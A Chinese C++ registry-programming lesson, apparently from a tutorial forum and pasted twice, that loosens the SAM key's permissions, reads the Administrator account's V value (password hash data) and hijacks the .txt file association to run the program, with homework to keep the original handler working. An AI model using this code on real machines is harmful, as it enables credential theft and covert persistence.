①、普通方式打開 SAM 子鍵:
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
MessageBox(_T("打開成功!"));
RegCloseKey(hKey);
}
===================================================
②、提升權限:
#include <Aclapi.h>
BOOL EnableRegSAMPriv()
{
BOOL bRet = TRUE;
DWORD dRet = 0;
PACL pOldDacl = NULL, pNewDacl = NULL;
EXPLICIT_ACCESS eia = {0};
PSECURITY_DESCRIPTOR pSID = NULL;
LPTSTR samName = _T("MACHINE\\SAM\\SAM"); //要修改的SAM項路徑
dRet = GetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDacl, NULL, &pSID); //獲取SAM主鍵的DACL
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}
//創建一個ACE,允許Administrators組成員完全控制對象,並允許子對象繼承此權限
BuildExplicitAccessWithName(&eia, _T("Administrators"), KEY_ALL_ACCESS, SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 將新的ACE加入DACL
dRet = SetEntriesInAcl(1, &eia, pOldDacl, &pNewDacl);
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}
// 更新SAM主鍵的DACL
dRet = SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}
__Error_End:
//釋放DACL和SID
if(pNewDacl) LocalFree(pNewDacl);
if(pSID) LocalFree(pSID);
return bRet;
}
===================================================
③、讀取數據:
EnableRegSAMPriv();
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
DWORD dwType = 0, dwDataLen = 0;
BYTE *lpData = NULL;
lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, NULL, &dwDataLen);
lpData = new BYTE[dwDataLen+1];
ZeroMemory(lpData, dwDataLen+1);
lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, lpData, &dwDataLen);
delete [] lpData;
RegCloseKey(hKey);
}
===================================================
④、修改註冊表實現文件類型關聯:C:\WINDOWS\notepad.exe %1
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("txtfile\\shell\\open\\command");
LONG lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
TCHAR szPath[MAX_PATH] = {0};
GetModuleFileName(NULL, szPath, MAX_PATH);
CString strFile = szPath;
strFile += _T(" %1");
RegSetValueEx(hKey, NULL, 0, REG_SZ, (LPBYTE)strFile.GetBuffer(), strFile.GetLength()*sizeof(TCHAR));
RegCloseKey(hKey);
}
===================================================
※※※ 小作業:
1、修改註冊表實現文件關聯後,不僅能打開本程序,還要打開默認關聯的程序!
參考帖子:http://www.cctry.com/thread-4026-1-1.html
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
MessageBox(_T("打開成功!"));
RegCloseKey(hKey);
}
===================================================
②、提升權限:
#include <Aclapi.h>
BOOL EnableRegSAMPriv()
{
BOOL bRet = TRUE;
DWORD dRet = 0;
PACL pOldDacl = NULL, pNewDacl = NULL;
EXPLICIT_ACCESS eia = {0};
PSECURITY_DESCRIPTOR pSID = NULL;
LPTSTR samName = _T("MACHINE\\SAM\\SAM"); //要修改的SAM項路徑
dRet = GetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDacl, NULL, &pSID); //獲取SAM主鍵的DACL
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}
//創建一個ACE,允許Administrators組成員完全控制對象,並允許子對象繼承此權限
BuildExplicitAccessWithName(&eia, _T("Administrators"), KEY_ALL_ACCESS, SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 將新的ACE加入DACL
dRet = SetEntriesInAcl(1, &eia, pOldDacl, &pNewDacl);
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}
// 更新SAM主鍵的DACL
dRet = SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}
__Error_End:
//釋放DACL和SID
if(pNewDacl) LocalFree(pNewDacl);
if(pSID) LocalFree(pSID);
return bRet;
}
===================================================
③、讀取數據:
EnableRegSAMPriv();
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
DWORD dwType = 0, dwDataLen = 0;
BYTE *lpData = NULL;
lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, NULL, &dwDataLen);
lpData = new BYTE[dwDataLen+1];
ZeroMemory(lpData, dwDataLen+1);
lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, lpData, &dwDataLen);
delete [] lpData;
RegCloseKey(hKey);
}
===================================================
④、修改註冊表實現文件類型關聯:C:\WINDOWS\notepad.exe %1
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("txtfile\\shell\\open\\command");
LONG lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
TCHAR szPath[MAX_PATH] = {0};
GetModuleFileName(NULL, szPath, MAX_PATH);
CString strFile = szPath;
strFile += _T(" %1");
RegSetValueEx(hKey, NULL, 0, REG_SZ, (LPBYTE)strFile.GetBuffer(), strFile.GetLength()*sizeof(TCHAR));
RegCloseKey(hKey);
}
===================================================
※※※ 小作業:
1、修改註冊表實現文件關聯後,不僅能打開本程序,還要打開默認關聯的程序!
參考帖子:http://www.cctry.com/thread-4026-1-1.html
